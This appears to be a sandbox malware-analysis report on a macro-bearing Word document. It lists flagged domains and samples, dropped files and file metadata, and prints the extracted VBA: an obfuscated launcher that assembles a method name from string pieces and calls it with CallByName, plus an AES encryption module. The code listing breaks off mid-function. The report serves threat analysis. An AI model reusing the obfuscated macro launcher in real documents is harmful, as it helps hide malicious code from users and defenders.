Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

⊘No simulations

LLM Input / Output

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown
URL: Office document Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Office document Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "Yes", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 5 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 2 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "OK", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 5 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 2 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "brands": "Microsoft" }
	{ "brands": "Microsoft" }

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	original.eml	Get hash	malicious	Unknown	Browse	199.232.214.172
	original.eml	Get hash	malicious	Unknown	Browse	199.232.214.172
	Mbda Us.pdf	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	T710XblGiM.docm	Get hash	malicious	Unknown	Browse	199.232.210.172
	T710XblGiM.docm	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://biomed.acemlna.com/lt.php?x=3TZy~GE4J6XM5p79_du5VOds1H_TjdEjvPthjaTKJ3DP65RA_ky.0.Rv2Y2liNA~j-xAXHXFJFQNDb.y_ELGV.Fw3Hyoi8	Get hash	malicious	Unknown	Browse	199.232.210.172
	P-04071A.xls	Get hash	malicious	Unknown	Browse	199.232.210.172
	P-04071A.xls	Get hash	malicious	Unknown	Browse	199.232.210.172
	hJ1bl8p7dJ.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	nNnzvybxiy.exe	Get hash	malicious	Unknown	Browse	199.232.210.172

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\~DFA56EB49069BF8E36.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFDD5D69EDAB118754.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$sIoO7xjt.doc

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.748796503766683
Encrypted:	false
SSDEEP:	3:KVGl/lilKlRAGljV/l/011rn/lfllMSvZk:KVy/4KDZV/l/CrnmcZk
MD5:	91BB9AD0AC6DC6CC051166B53C2EBB37
SHA1:	636FFF475F617AEC40233D68FF279DAE91104902
SHA-256:	3D1CB0C526BFDA412FA917793114AF2B4BACE06DEE53AB791981AC194E6B0706
SHA-512:	6058990FF91A2476584631F2AFFF464308C2100F007106753253D32A46CD080A10BD573769FBA8838006FB311478B5B64443850BBBB77FD0011B69D5DBF7B827
Malicious:	false
Reputation:	low
Preview:	.user..................................................j.o.n.e.s...Y..........wJ......9..a.i............................................T.wJ."..}..i........=.i

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: ADMIN, Template: Normal, Last Saved By: george, Revision Number: 25, Name of Creating Application: Microsoft Office Word, Total Editing Time: 26:00, Create Time/Date: Mon Dec 16 06:28:00 2024, Last Saved Time/Date: Sun Dec 15 16:12:00 2024, Number of Pages: 1, Number of Words: 3, Number of Characters: 22, Security: 0
Entropy (8bit):	5.0423425766922865
TrID:	Microsoft Word document (32009/1) 54.23% Microsoft Word document (old ver.) (19008/1) 32.20% Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:	0dsIoO7xjt.docx
File size:	96'768 bytes
MD5:	0e9896e59a862c48c6543c7cb0c8b58d
SHA1:	4681d90574c5644de87641b298b020f0dc076c06
SHA256:	01a4a8f7962a076f7a3b71d5d261bc378e0901f0f46eb9d1f453609d3da63e1e
SHA512:	5738cc68015d87992e89f46ea620169d7202e4c35d85aeba33076836ba14dbffbde2df192d74a7acefe435b636db08788fef03371c7115e86f308ff3aec6a0f7
SSDEEP:	1536:zyktu2qb5Lj90/ph6PhGi/dB1P1AHyEivP2ZcCi8tXpEvMcz8EoXK:zatLj90/P6PhGi/dB1P1AHyEivuZc986
TLSH:	4D932859F582C92EDBD809764C9BD7FAB3787D066E44D7173260B35E2CB27A4C106384
File Content Preview:	........................>.......................'...........)...............&...0..............................................................................................................................................................................

File Icon


Icon Hash:	35e5c48caa8a8599

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "0dsIoO7xjt.docx"

Indicators

Has Summary Info:
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Title:
Subject:
Author:	ADMIN
Keywords:
Comments:
Template:	Normal
Last Saved By:	george
Revion Number:	25
Total Edit Time:	1560
Create Time:	2024-12-16 06:28:00
Last Saved Time:	2024-12-15 16:12:00
Number of Pages:	1
Number of Words:	3
Number of Characters:	22
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Document Code Page:	1252
Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 1446

General
Stream Path:	Macros/VBA/Module1
VBA File Name:	Module1.bas
Stream Size:	1446
Data ASCII:	. . . . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . < 4 . . . . . . < . . . . . . . < . . . . . . . < . . . . . . . . . . . . . . . . x . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 1a 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 22 03 00 00 a2 04 00 00 00 00 00 00 01 00 00 00 d4 44 12 16 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Module1"
Public Sub CallTestAES()
    Dim kakensooe As New ViewSession
    Dim methodName As String

    ' Ghp tn hm t? cc ph?n nh?
    methodName = "ikwi" & "wiejs" & "_19293_Ade"

    ' G?i hm b?ng tn d ghp
    CallByName kakensooe, methodName, VbMethod
End Sub

VBA File Name: Module3.bas, Stream Size: 48244

General
Stream Path:	Macros/VBA/Module3
VBA File Name:	Module3.bas
Stream Size:	48244
Data ASCII:	. . . . . 4 . . . C . . . . . . . . . . C . . . . . . . . . . . . D . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . R t l M o v e M e m o r y . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . V a r P t r . . . . . x . . . 0 . . . . . . . . . . . . . . . . . . . . . . . h t o n l . . . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . S y s t e m F u n c t i o n 0 3 6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B C r
Data Raw:	01 16 03 00 00 34 05 00 00 be 43 00 00 18 05 00 00 1c 06 00 00 ff ff ff ff c6 43 00 00 fe 94 00 00 08 00 00 00 01 00 00 00 d4 44 f8 87 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 44 04 00 00 00 00 9e 02 20 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 74 6c 4d 6f 76 65 4d 65 6d 6f 72 79 00 00 00 00 00 a4 02 50 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Module3"
'--- mdAesCtr.bas
Option Explicit
DefObj A-Z

#Const HasPtrSafe = (VBA7 <> 0) Or (TWINBASIC <> 0)

'=========================================================================
' API
'=========================================================================

#If Win64 Then
    Private Const PTR_SIZE                  As Long = 8
#Else
    Private Const PTR_SIZE                  As Long = 4
#End If

#If HasPtrSafe Then
Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Private Declare PtrSafe Function ArrPtr Lib "vbe7" Alias "VarPtr" (Ptr() As Any) As LongPtr
Private Declare PtrSafe Function htonl Lib "ws2_32" (ByVal hostlong As Long) As Long
Private Declare PtrSafe Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036" (RandomBuffer As Any, ByVal RandomBufferLength As Long) As Long
'--- bcrypt
Private Declare PtrSafe Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm As LongPtr, ByVal pszAlgId As LongPtr, ByVal pszImplementation As LongPtr, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm As LongPtr, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptGetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, pbOutput As Any, ByVal cbOutput As Long, cbResult As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptSetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, ByVal pbInput As LongPtr, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phKey As LongPtr, pbKeyObject As Any, ByVal cbKeyObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey As LongPtr) As Long
Private Declare PtrSafe Function BCryptEncrypt Lib "bcrypt" (ByVal hKey As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal pPaddingInfo As LongPtr, ByVal pbIV As LongPtr, ByVal cbIV As Long, pbOutput As Any, ByVal cbOutput As Long, pcbResult As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf As LongPtr, pbPassword As Any, ByVal cbPassword As Long, pbSalt As Any, ByVal cbSalt As Long, ByVal cIterations As Currency, pbDerivedKey As Any, ByVal cbDerivedKey As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phHash As LongPtr, ByVal pbHashObject As LongPtr, ByVal cbHashObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash As LongPtr) As Long
Private Declare PtrSafe Function BCryptHashData Lib "bcrypt" (ByVal hHash As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptFinishHash Lib "bcrypt" (ByVal hHash As LongPtr, pbOutput As Any, ByVal cbOutput As Long, ByVal dwFlags As Long) As Long
#Else
Private Enum LongPtr
    [_]
End Enum
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Private Declare Function ArrPtr Lib "msvbvm60" Alias "VarPtr" (Ptr() As Any) As LongPtr
Private Declare Function htonl Lib "ws2_32" (ByVal hostlong As Long) As Long
Private Declare Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036" (RandomBuffer As Any, ByVal RandomBufferLength As Long) As Long
'--- bcrypt
Private Declare Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm As LongPtr, ByVal pszAlgId As LongPtr, ByVal pszImplementation As LongPtr, ByVal dwFlags As Long) As Long
Private Declare Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm As LongPtr, ByVal dwFlags As Long) As Long
Private Declare Function BCryptGetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, pbOutput As Any, ByVal cbOutput As Long, cbResult As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptSetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, ByVal pbInput As LongPtr, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phKey As LongPtr, pbKeyObject As Any, ByVal cbKeyObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey As LongPtr) As Long
Private Declare Function BCryptEncrypt Lib "bcrypt" (ByVal hKey As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal pPaddingInfo As LongPtr, ByVal pbIV As LongPtr, ByVal cbIV As Long, pbOutput As Any, ByVal cbOutput As Long, pcbResult As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf As LongPtr, pbPassword As Any, ByVal cbPassword As Long, pbSalt As Any, ByVal cbSalt As Long, ByVal cIterations As Currency, pbDerivedKey As Any, ByVal cbDerivedKey As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phHash As LongPtr, ByVal pbHashObject As LongPtr, ByVal cbHashObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash As LongPtr) As Long
Private Declare Function BCryptHashData Lib "bcrypt" (ByVal hHash As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptFinishHash Lib "bcrypt" (ByVal hHash As LongPtr, pbOutput As Any, ByVal cbOutput As Long, ByVal dwFlags As Long) As Long
#End If
#If Not ImplUseShared Then
    #If HasPtrSafe Then
    Private Declare PtrSafe Function CryptStringToBinary Lib "crypt32" Alias "CryptStringToBinaryW" (ByVal pszString As LongPtr, ByVal cchString As Long, ByVal dwFlags As Long, ByVal pbBinary As LongPtr, pcbBinary As Long, pdwSkip As Long, pdwFlags As Long) As Long
    Private Declare PtrSafe Function CryptBinaryToString Lib "crypt32" Alias "CryptBinaryToStringW" (ByVal pbBinary As LongPtr, ByVal cbBinary As Long, ByVal dwFlags As Long, ByVal pszString As LongPtr, pcchString As Long) As Long
    Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
    Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
    Private Declare PtrSafe Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
    #Else
    Private Declare Function CryptStringToBinary Lib "crypt32" Alias "CryptStringToBinaryW" (ByVal pszString As LongPtr, ByVal cchString As Long, ByVal dwFlags As Long, ByVal pbBinary As LongPtr, pcbBinary As Long, pdwSkip As Long, pdwFlags As Long) As Long
    Private Declare Function CryptBinaryToString Lib "crypt32" Alias "CryptBinaryToStringW" (ByVal pbBinary As LongPtr, ByVal cbBinary As Long, ByVal dwFlags As Long, ByVal pszString As LongPtr, pcchString As Long) As Long
    Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
    Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
    Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
    #End If
#End If

'=========================================================================
' Constants and member variables
'=========================================================================

Private Const AES_BLOCK_SIZE        As Long = 16
Private Const AES_KEYLEN            As Long = 32                    '-- 32 -> AES-256, 24 -> AES-196, 16 -> AES-128
Private Const AES_IVLEN             As Long = AES_BLOCK_SIZE
Private Const KDF_SALTLEN           As Long = 8
Private Const KDF_ITER              As Long = 10000
Private Const KDF_HASH              As String = "SHA512"
Private Const HMAC_HASH             As String = "SHA256"
Private Const OPENSSL_MAGIC         As String = "Salted__"          '-- for openssl compatibility
Private Const OPENSSL_MAGICLEN      As Long = 8
Private Const ERR_UNSUPPORTED_ENCR  As String = "Unsupported encryption"
Private Const ERR_CHUNKED_NOT_INIT  As String = "AES chunked context not initialized"

Private Type UcsCryptoContextType
    hPbkdf2Alg          As LongPtr
    hHmacAlg            As LongPtr
    hHmacHash           As LongPtr
    HashLen             As Long
    hAesAlg             As LongPtr
    hAesKey             As LongPtr
    AesKeyObjData()     As Byte
    AesKeyObjLen        As Long
    Nonce(0 To 3)       As Long
    EncrData()          As Byte
    EncrPos             As Long
    LastError           As String
End Type

Private m_uChunkedCtx           As UcsCryptoContextType

'=========================================================================
' Functions
'=========================================================================

'--- equivalent to `openssl aes-256-ctr -pbkdf2 -md sha512 -pass pass:{Password} -in {sText}.file -a`
Public Function AesEncryptString(sText As String, Optional Password As Variant) As String
    Const PREFIXLEN     As Long = OPENSSL_MAGICLEN + KDF_SALTLEN
    Dim baData()        As Byte
    Dim baPass()        As Byte
    Dim baSalt()        As Byte
    Dim baKey()         As Byte
    Dim sError          As String
    
    baData = ToUtf8Array(sText)
    baPass = vbNullString
    baSalt = vbNullString
    If Not IsArray(Password) Then
        If Not IsMissing(Password) Then
            baPass = ToUtf8Array(Password & vbNullString)
        End If
        ReDim baSalt(0 To KDF_SALTLEN - 1) As Byte
        Call RtlGenRandom(baSalt(0), KDF_SALTLEN)
    Else
        baKey = Password
    End If
    If Not AesCryptArray(baData, baPass, baSalt, baKey, Error:=sError) Then
        Err.Raise vbObjectError, , sError
    End If
    If Not IsArray(Password) Then
        ReDim Preserve baData(0 To UBound(baData) + PREFIXLEN) As Byte
        If UBound(baData) >= PREFIXLEN Then
            Call CopyMemory(baData(PREFIXLEN), baData(0), UBound(baData) + 1 - PREFIXLEN)
        End If
        Call CopyMemory(baData(OPENSSL_MAGICLEN), baSalt(0), KDF_SALTLEN)
        Call CopyMemory(baData(0), ByVal OPENSSL_MAGIC, OPENSSL_MAGICLEN)
    End If
    AesEncryptString = Replace(ToBase64Array(baData), vbCrLf, vbNullString)
End Function

'--- equivalent to `openssl aes-256-ctr -pbkdf2 -md sha512 -pass pass:{Password} -in {sEncr}.file -a -d`
Public Function AesDecryptString(sEncr As String, Optional Password As Variant) As String
    Const PREFIXLEN     As Long = OPENSSL_MAGICLEN + KDF_SALTLEN
    Dim baData()        As Byte
    Dim baPass()        As Byte
    Dim baSalt()        As Byte
    Dim baKey()         As Byte
    Dim sMagic          As String
    Dim sError          As String
    
    baData = FromBase64Array(sEncr)
    baPass = vbNullString
    baSalt = vbNullString
    If Not IsArray(Password) Then
        If Not IsMissing(Password) Then
            baPass = ToUtf8Array(Password & vbNullString)
        End If
        If UBound(baData) >= PREFIXLEN - 1 Then
            sMagic = String$(OPENSSL_MAGICLEN, 0)
            Call CopyMemory(ByVal sMagic, baData(0), OPENSSL_MAGICLEN)
            If sMagic = OPENSSL_MAGIC Then
                ReDim baSalt(0 To KDF_SALTLEN - 1) As Byte
                Call CopyMemory(baSalt(0), baData(OPENSSL_MAGICLEN), KDF_SALTLEN)
                If UBound(baData) >= PREFIXLEN Then
                    Call CopyMemory(baData(0), baData(PREFIXLEN), UBound(baData) + 1 - PREFIXLEN)
                    ReDim Preserve baData(0 To UBound(baData) - PREFIXLEN) As Byte
                Else
                    baData = vbNullString
                End If
            End If
        End If
    Else
        baKey = Password
    End If
    If Not AesCryptArray(baData, baPass, baSalt, baKey, Error:=sError) Then
        Err.Raise vbObjectError, , sError
    End If
    AesDecryptString = FromUtf8Array(baData)
End Function

Public Function AesCryptArray(             baData() As Byte,             Optional Password As Variant,             Optional Salt As Variant,             Optional key As Variant,             Optional ByVal KeyLen As Long,             Optional Error As String,             Optional Hmac As Variant) As Boolean
    Const VT_BYREF      As Long = &H4000
    Dim uCtx            As UcsCryptoContextType
    Dim vErr            As Variant
    Dim bHashBefore     As Boolean
    Dim bHashAfter      As Boolean
    Dim baPass()        As Byte
    Dim baSalt()        As Byte
    Dim baKey()         As Byte
    Dim baTemp()        As Byte
    Dim lPtr            As LongPtr
    
    On Error GoTo EH
    If IsArray(Hmac) Then
        bHashBefore = (Hmac(0) <= 0)
        bHashAfter = (Hmac(0) > 0)
    End If
    If IsMissing(Password) Then
        baPass = vbNullString
    ElseIf IsArray(Password) Then
        baPass = Password
    Else
        baPass = ToUtf8Array(Password & vbNullString)
    End If
    If IsMissing(Salt) Then
        baSalt = baPass
    ElseIf IsArray(Salt) Then
        baSalt = Salt
    Else
        baSalt = ToUtf8Array(Salt & vbNullString)
    End If
    If IsArray(key) Then
        baKey = key
    End If
    If KeyLen <= 0 Then
        KeyLen = AES_KEYLEN
    End If
    If Not pvCryptoAesCtrInit(uCtx, baPass, baSalt, baKey, KeyLen) Then
        Error = uCtx.LastError
        GoTo QH
    End If
    If Not pvCryptoAesCtrCrypt(uCtx, baData, HashBefore:=bHashBefore, HashAfter:=bHashAfter) Then
        Error = uCtx.LastError
        GoTo QH
    End If
    If IsArray(Hmac) Then
        baTemp = pvCryptoGetFinalHash(uCtx, UBound(Hmac) + 1)
        #If Win64 Then
            lPtr = PeekPtr(VarPtr(Hmac) + 8)
        #Else
            lPtr = PeekPtr((VarPtr(Hmac) Xor &H80000000) + 8 Xor &H80000000)
        #End If
        If (PeekPtr(VarPtr(Hmac)) And VT_BYREF) <> 0 Then
            lPtr = PeekPtr(lPtr)
        End If
        #If Win64 Then
            lPtr = PeekPtr(lPtr + 16)
        #Else
            lPtr = PeekPtr((lPtr Xor &H80000000) + 12 Xor &H80000000)
        #End If
        Call CopyMemory(ByVal lPtr, baTemp(0), UBound(baTemp) + 1)
    End If
    '--- success
    AesCryptArray = True
QH:
    pvCryptoAesCtrTerminate uCtx
    Exit Function
EH:
    vErr = Array(Err.Number, Err.Source, Err.Description)
    pvCryptoAesCtrTerminate uCtx
    Err.Raise vErr(0), vErr(1), vErr(2)
End Function

Public Function AesChunkedInit(Optional key As Variant, Optional ByVal KeyLen As Long) As Boolean
    Dim baEmpty()       As Byte
    Dim baKey()         As Byte
    
    pvCryptoAesCtrTerminate m_uChunkedCtx
    baEmpty = vbNullString
    If IsArray(key) Then
        baKey = key
    End If
    If KeyLen <= 0 Then
        KeyLen = AES_KEYLEN
    End If
    AesChunkedInit = pvCryptoAesCtrInit(m_uChunkedCtx, baEmpty, baEmpty, baKey, KeyLen)
End Function

Public Function AesChunkedCryptArray(baInput() As Byte, baOutput() As Byte, Optional ByVal Final As Boolean = True) As Boolean
    If m_uChunkedCtx.hAesAlg = 0 Then
        m_uChunkedCtx.LastError = ERR_CHUNKED_NOT_INIT
        Exit Function
    End If
    baOutput = baInput
    AesChunkedCryptArray = pvCryptoAesCtrCrypt(m_uChunkedCtx, baOutput)
    If Final Then
        pvCryptoAesCtrTerminate m_uChunkedCtx
    End If
End Function

Public Function AesChunkedGetLastError() As String
    AesChunkedGetLastError = m_uChunkedCtx.LastError
End Function

'= private ===============================================================

Private Function pvCryptoAesCtrInit(uCtx As UcsCryptoContextType, baPass() As Byte, baSalt() As Byte, baDerivedKey() As Byte, ByVal lKeyLen As Long) As Boolean
    Const MS_PRIMITIVE_PROVIDER         As String = "Microsoft Primitive Provider"
    Const BCRYPT_ALG_HANDLE_HMAC_FLAG   As Long = 8
    Dim hResult         As Long
    
    With uCtx
        '--- init member vars
        .EncrData = vbNullString
        .EncrPos = 0
        .LastError = vbNullString
        ReDim Preserve baDerivedKey(0 To lKeyLen + AES_IVLEN - 1) As Byte
        If UBound(baPass) >= 0 Or UBound(baSalt) >= 0 Then
